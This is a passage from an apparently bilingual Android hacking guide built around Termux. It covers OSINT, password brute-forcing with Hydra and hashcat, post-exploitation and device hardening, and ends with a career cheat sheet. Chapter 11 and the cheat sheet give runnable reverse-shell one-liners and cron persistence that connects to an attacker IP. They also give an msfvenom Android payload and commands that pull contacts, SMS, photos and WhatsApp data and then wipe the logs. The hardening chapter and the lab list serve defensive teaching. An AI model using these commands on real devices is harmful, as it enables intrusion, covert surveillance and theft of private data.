    Number:    +8801XXXXXXXXX
    Country:   Bangladesh
    Carrier:   Grameenphone
    Line Type: Mobile
    Valid:     true

    # Phone lookup sites listed by OsintFramework:
    # truecaller.com, sync.me, whitepages.com

🌐 Website/Domain OSINT

    # WHOIS lookup
    whois target.com

    # DNS records
    nslookup target.com
    dig target.com ANY
    dig target.com MX      # Mail servers
    dig target.com TXT     # TXT records (often has juicy info)

    # Reverse IP (other sites on same server)
    curl "https://api.hackertarget.com/reverseiplookup/?q=IP_HERE"

    # Shodan (Internet-connected device search)
    pip install shodan
    shodan init YOUR_API_KEY
    shodan host IP_ADDRESS
    shodan search "target.com"

    # Wayback Machine (old versions of website)
    curl "http://archive.org/wayback/available?url=target.com"

🕵️ Chapter Summary

  • 👤 Sherlock = search username on 400+ sites at once
  • 📧 holehe = find which sites use an email
  • 🌐 Shodan = internet's Google for hackers

Chapter 10
🔑 Password Attacks
Brute Force, Dictionary Attack, Hash Cracking — with Termux

📚 Creating Wordlists

    # rockyou.txt (the most popular wordlist)
    # Already present on Kali
    ls /usr/share/wordlists/
    gunzip /usr/share/wordlists/rockyou.txt.gz

    # cupp: custom wordlist (from the target's info)
    pip install cupp
    cupp -i
    # Enter name, birthday, partner, pet name
    # Output: custom_wordlist.txt (thousands of variations)

    # crunch: pattern-based wordlist
    pkg install crunch
    crunch 8 8 0123456789 -o numeric_8.txt   # 8-digit numbers only
    crunch 6 10 abcdefgh -o alpha.txt        # 6-10 char alphabet

    # CeWL: build a wordlist from a website
    gem install cewl
    cewl https://target.com -d 2 -m 5 -w wordlist.txt

💥 Hydra — Network Brute Force

    # SSH Brute Force
    hydra -l admin -P rockyou.txt ssh://192.168.1.100
    hydra -L users.txt -P passwords.txt ssh://192.168.1.100

    # FTP Brute Force
    hydra -l admin -P passwords.txt ftp://192.168.1.100

    # HTTP Login Form
    hydra -l admin -P rockyou.txt 192.168.1.100 \
        http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

    # WordPress Login
    hydra -l admin -P rockyou.txt \
        192.168.1.100 http-post-form \
        "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect"

    # MySQL
    hydra -l root -P passwords.txt 192.168.1.100 mysql

    # Speed control (Rate limiting bypass)
    hydra -l admin -P rockyou.txt -t 4 -W 2 ssh://192.168.1.100
    # -t = threads, -W = wait seconds

🔓 Hash Cracking — hashcat & john

    # Identify the hash type
    hash-identifier "5f4dcc3b5aa765d61d8327deb882cf99"

    # john the ripper
    pkg install john
    john --wordlist=rockyou.txt hashes.txt          # Dictionary attack
    john --format=md5 --wordlist=rockyou.txt hash.txt
    john --show hashes.txt                          # show cracked passwords

    # hashcat (GPU; more useful on a desktop)
    hashcat -m 0 hash.txt rockyou.txt               # MD5
    hashcat -m 1000 hash.txt rockyou.txt            # NTLM (Windows)
    hashcat -m 1800 hash.txt rockyou.txt            # SHA-512 (Linux)
    hashcat -m 3200 hash.txt rockyou.txt            # bcrypt
    hashcat -m 22000 hash.hc22000 rockyou.txt       # WPA2

    # Hash Type Reference:
    MD5    = -m 0    → 5f4dcc3b5aa765d61d8327deb882cf99
    SHA1   = -m 100  → 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
    SHA256 = -m 1400
    bcrypt = -m 3200 → $2y$10$...

🔑 Chapter Summary

  • 📚 Create custom wordlists from target info using cupp
  • 💥 Hydra = brute force SSH, FTP, HTTP and all services
  • 🔓 hashcat + rockyou = crack MD5 passwords in 5 minutes

Chapter 11
🎭 Post Exploitation — Access পাওয়ার পরেAfter Getting Access
System-এ ঢোকার পরে কী করে Privilege বাড়ানো যায়, কীভাবে Persistence রাখা যায়After entering a system — how to escalate privileges and maintain persistence

⬆️ Privilege Escalation — Android

# System info gather করো adb shell getprop ro.build.version.release # Android version adb shell getprop ro.build.fingerprint # Build info adb shell cat /proc/version # Kernel version # CVE check — known kernel exploits # Android 9 = Kernel 4.x → search for privilege escalation CVEs # SUID binaries খোঁজো adb shell find / -perm -4000 2>/dev/null # Writable directories adb shell find / -writable -type d 2>/dev/null | head -20 # Running services adb shell ps -A | grep -v "kthre\|kwork"

🔁 Persistence — Access ধরে রাখাMaintaining Access

# Meterpreter persistence module meterpreter > run persistence -A -S -U -X -i 30 -p 4444 -r 192.168.1.X # -A = autostart msfconsole # -S = run as service # -X = start on boot # -i = interval (seconds) # Cronjob persistence (Linux server) crontab -e # Add: */5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.X/4444 0>&1' # Reverse Shell one-liners # Bash bash -i >& /dev/tcp/192.168.1.X/4444 0>&1 # Python python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("192.168.1.X",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' # Netcat nc -e /bin/bash 192.168.1.X 4444

📦 Data Exfiltration

    # Meterpreter — Data collection
    meterpreter > run post/multi/recon/local_exploit_suggester
    meterpreter > run post/android/gather/contacts
    meterpreter > run post/android/gather/call_logs
    meterpreter > run post/android/gather/sms
    meterpreter > run post/android/gather/get_user_files

    # Pull all photos over ADB
    adb pull /sdcard/DCIM/ ./photos/
    adb pull /sdcard/WhatsApp/ ./whatsapp_backup/

    # Clear tracks
    meterpreter > clearev      # Event logs clear
    adb shell logcat -c        # System logs clear

🎭 Chapter Summary

  • ⬆️ Privilege Escalation = more control over the system
  • 🔁 Persistence = maintain connection after device restart
  • 🧹 Clearing tracks is part of professional pentesting
Chapter 12
🛡️ Android Security Hardening
Complete guide to securing your Android device and Termux

📱 Android Device Hardening

Do This

  • 💡 Always keep OS updated
  • 🔐 Strong PIN/Password (6+ digit)
  • 🔒 Enable Full Disk Encryption
  • 📲 Install apps only from Play Store
  • 🌐 Use VPN (on public WiFi)
  • 🔑 Enable 2FA on all accounts
  • 🧹 Delete unused apps

Don't Do This

  • Install unknown APKs
  • Do banking on public WiFi
  • Click links in SMS
  • Grant unnecessary permissions
  • Leave USB Debugging enabled
  • Leave Developer Options open
  • Turn off SELinux after rooting
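
Several items on these lists can be read back from a device you own, as an added example that is not part of the original guide: `collect_settings` queries the device over ADB and `audit_settings` turns the answers into findings. The function names, the key=value format, the sample values and the minimum patch date are assumptions made for this example.

```shell
# Added example (not from the original guide). Function names, the key=value
# format and the sample values are constructed for illustration.

# Query a device you own over ADB and print key=value lines.
collect_settings() {
    for q in "adb_enabled=settings get global adb_enabled" \
             "dev_options=settings get global development_settings_enabled" \
             "selinux=getenforce" \
             "crypto_state=getprop ro.crypto.state" \
             "security_patch=getprop ro.build.version.security_patch"; do
        # ${q#*=} is the device-side command; strip the CR some devices append
        printf '%s=%s\n' "${q%%=*}" "$(adb shell "${q#*=}" | tr -d '\r')"
    done
}

# Read key=value lines on stdin and print one FINDING per weak setting.
# $1 is the oldest security patch level you accept (YYYY-MM-DD).
audit_settings() {
    min_patch="$1"
    while IFS='=' read -r key value; do
        case "$key=$value" in
            adb_enabled=1) echo "FINDING: USB debugging is on" ;;  # always 1 over ADB: switch off when done
            dev_options=1) echo "FINDING: Developer Options are open" ;;
            selinux=Enforcing|crypto_state=encrypted) ;;
            selinux=*) echo "FINDING: SELinux is $value, not Enforcing" ;;
            crypto_state=*) echo "FINDING: storage is $value, not encrypted" ;;
            security_patch=*)
                # ISO dates sort as strings, so a lexical compare is enough
                if [ "$(expr "x$value" \< "x$min_patch")" = 1 ]; then
                    echo "FINDING: patch level $value is older than $min_patch"
                fi ;;
        esac
    done
}

# Constructed sample of what collect_settings might print.
sample_settings() {
    cat <<'EOF'
adb_enabled=1
dev_options=1
selinux=Permissive
crypto_state=encrypted
security_patch=2023-01-05
EOF
}

# Real use: collect_settings | audit_settings 2024-01-01
sample_settings | audit_settings 2024-01-01
```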

🔒 Termux Security

    # Create an SSH key (instead of a password)
    ssh-keygen -t ed25519 -C "termux@android"
    cat ~/.ssh/id_ed25519.pub

    # Start the Termux SSH server (password-less)
    pkg install openssh
    sshd                                  # Start the SSH server; it listens on port 8022, not 22

    # File Encryption
    pkg install gnupg
    gpg --symmetric secret_file.txt       # Encrypt
    gpg --decrypt secret_file.txt.gpg     # Decrypt

    # Network Monitoring — who is talking?
    netstat -an | grep ESTABLISHED
    ss -tp

    # Firewall rules (root required)
    iptables -L                                           # Current rules
    iptables -A INPUT -i lo -j ACCEPT                     # Keep loopback traffic working
    iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT   # Allow replies to outbound connections
    iptables -A INPUT -p tcp --dport 8022 -j ACCEPT       # Allow SSH
    iptables -A INPUT -j DROP                             # Block rest
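
Generating a key only makes the server password-less once password logins are switched off in `sshd_config`. As an added example (not from the original guide), this check reports the effective `PasswordAuthentication` and `PubkeyAuthentication` values using sshd's first-value-wins rule; the function names and both sample configs are constructed, and `$PREFIX/etc/ssh/sshd_config` is the usual Termux location.

```shell
# Added example (not from the original guide). Function names and both sample
# configs are constructed for illustration.

# Print the effective value of keyword $1 from an sshd_config on stdin.
# sshd keeps the first value it reads; $2 is the default when the keyword is unset.
effective_option() {
    awk -F'[ \t=]+' -v want="$1" -v def="$2" '
        { sub(/^[ \t]+/, "") }               # trim indent; awk re-splits fields
        /^(#|$)/ { next }                    # comments and blank lines
        tolower($1) == "match" { exit }      # conditional blocks are out of scope
        tolower($1) == tolower(want) { print $2; found = 1; exit }
        END { if (!found) print def }
    '
}

# Read an sshd_config on stdin; list weak settings and return 1 if any.
check_sshd_config() {
    cfg=$(cat)
    rc=0
    pw=$(printf '%s\n' "$cfg" | effective_option PasswordAuthentication yes)
    pk=$(printf '%s\n' "$cfg" | effective_option PubkeyAuthentication yes)
    if [ "$pw" != "no" ]; then
        echo "WEAK: PasswordAuthentication is $pw (want no)"; rc=1
    fi
    if [ "$pk" = "no" ]; then
        echo "WEAK: PubkeyAuthentication is no (want yes)"; rc=1
    fi
    return "$rc"
}

# Constructed sample: a key exists, but password logins are still allowed.
sample_weak() {
    printf '%s\n' 'PrintMotd yes' 'PasswordAuthentication yes'
}

# Constructed sample: the later "yes" is ignored because the first value wins.
sample_hardened() {
    printf '%s\n' 'PasswordAuthentication no' 'PubkeyAuthentication yes' \
        'PasswordAuthentication yes'
}

# Real use in Termux: check_sshd_config < "$PREFIX/etc/ssh/sshd_config"
sample_weak | check_sshd_config || true
```

On the device itself, `sshd -T` prints the configuration the server will actually use and is the authoritative check.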

🛡️ Chapter Summary

  • 🔒 Encryption + 2FA + Strong Password = Basic Security
  • 📲 Don't install unknown APKs — biggest risk
  • 🌐 Never work on public WiFi without VPN
Chapter 13
🏆 CTF Practice & Lab Setup
Safe practice with vulnerable apps — Android security testing lab

📱 Vulnerable Android Apps — Practice Targets

| App | What You Learn | Download | Level |
|---|---|---|---|
| DIVA | All types of Android vulns | GitHub | Beginner |
| InsecureBankv2 | Banking app vulnerabilities | GitHub | Medium |
| AndroGoat | OWASP Mobile Top 10 | GitHub | Medium |
| MSTG Crackmes | Reverse Engineering | GitHub | Hard |
| HackTheBox Android | Real CTF challenges | htb.com | Hard |

🧪 DIVA — Start Here First

    # DIVA (Damn Insecure and Vulnerable App) download
    wget https://github.com/0xArab/diva-apk-file/raw/master/DivaApplication.apk

    # Install on your own phone
    adb install DivaApplication.apk

    # DIVA's 13 challenges:
    # 01. Insecure Logging
    # 02. Hardcoded Issues
    # 03. Insecure Data Storage (SharedPreferences)
    # 04. Insecure Data Storage (SQLite)
    # 05. Insecure Data Storage (Temp Files)
    # 06. Insecure Data Storage (External Storage)
    # 07. Input Validation Issues (SQLi)
    # 08. Input Validation Issues (XSS)
    # 09. Access Control Issues
    # 10. Insecure Data Storage (3rd Party Libs)
    # 11. Input Validation Issues (BufferOverflow)
    # 12. Hardcoded Issues (Part 2)
    # 13. Input Validation Issues (SQL Injection — Part 2)

    # Challenge 3 — solving SharedPreferences:
    adb shell cat /data/data/jakhar.aseem.diva/shared_prefs/*.xml

🌐 Online Practice Platforms

HackTheBox

  • Android CTF machines
  • APK challenges
  • Real-world scenarios
  • Free tier available

TryHackMe

  • Guided Android rooms
  • Step-by-step learning
  • Beginner friendly
  • Free + Premium

PortSwigger

  • Mobile web testing
  • API testing
  • 100% Free
  • Best for beginners

🏆 Chapter Summary

  • 📱 Start with DIVA — 13 challenges covering everything
  • 🏆 HackTheBox = real-world Android hacking practice
  • 🌐 TryHackMe = guided learning, best for beginners
Chapter 14
📚 Career Path, Resources & Cheat Sheet
Complete Termux Cheat Sheet, Career Guide, and best resources

🗺️ Career Path — Android Security

1. Month 1–2: Foundation
   Termux setup, ADB, Android architecture, DIVA practice
   Tags: Termux, ADB, DIVA
2. Month 3–4: Tools
   Metasploit, APK Analysis, Network Attacks, Hydra
   Tags: Metasploit, apktool, MITM
3. Month 5–6: CTF
   HackTheBox, TryHackMe Android challenges
   Tags: HackTheBox, TryHackMe, CTF
4. Month 7+: Bug Bounty
   Start Android App Bug Bounty on HackerOne/Bugcrowd
   Tags: Bug Bounty, Android Pentest, 💰 Earning

📋 Complete Termux Cheat Sheet

📦 Termux Basics

    pkg update && pkg upgrade                             # System update
    pkg install [tool]                                    # Tool install
    termux-setup-storage                                  # Storage access
    proot-distro login kali                               # Enter Kali Linux
    termux-wake-lock                                      # Keep screen alive

🗺️ Network Recon

    nmap -sn 192.168.1.0/24                               # Host discovery
    nmap -sV -sC [IP]                                     # Service scan
    netdiscover -r [range]                                # ARP scan
    tcpdump -i wlan0 -w cap.pcap                          # Packet capture
    whois [domain]                                        # Domain info

📲 APK Analysis

    apktool d app.apk -o out/                             # Decompile APK
    jadx -d out/ app.apk                                  # Java decompile
    apktool b out/ -o new.apk                             # Recompile APK
    grep -ri "api_key" out/                               # Find secrets
    adb install app.apk                                   # Install APK

💣 Exploitation

    msfvenom -p android/... LHOST=X LPORT=4444 -o a.apk   # Android payload
    msfconsole -q                                         # Start Metasploit
    use exploit/multi/handler                             # Start listener
    sessions -l                                           # List sessions
    sessions -i 1                                         # Enter session

🔑 Password Attack

    hydra -l admin -P rockyou.txt ssh://[IP]              # SSH brute
    hashcat -m 0 hash.txt wordlist.txt                    # MD5 crack
    john --wordlist=list.txt hash.txt                     # John crack
    cupp -i                                               # Custom wordlist
    crunch 8 8 0-9 -o nums.txt                            # Generate wordlist

🕵️ OSINT

    python3 sherlock [username]                           # Username search
    holehe [email]                                        # Email OSINT
    phoneinfoga scan -n "+880..."                         # Phone OSINT
    theHarvester -d target.com -b all                     # Domain harvest
    shodan host [IP]                                      # Shodan lookup

📚 Best Resources

🆓 Free

  • OWASP Mobile Testing Guide
  • PortSwigger Web Academy
  • TryHackMe (free tier)
  • HackTheBox (free)
  • YouTube: NetworkChuck
  • NullByte.WonderHowTo.com

📖 Books

  • Android Security Internals
  • The Mobile Application Hacker's Handbook
  • Android Hacker's Handbook
  • Hacking APIs — Corey J Ball

🏅 Certifications

  • eMAPT (eLearnSecurity)
  • GMOB (GIAC)
  • CEH (EC-Council)
  • OSCP (Offensive Security)

📱 "Security is not a product, but a process — and Termux is your laboratory."

This guide is entirely educational. Always practice on your own device or in an authorized lab.

Android Hacking (Termux-based) — Complete Bilingual Guide

14 Chapters • Bilingual • Dark Mode • Full Cheat Sheet • Career Guide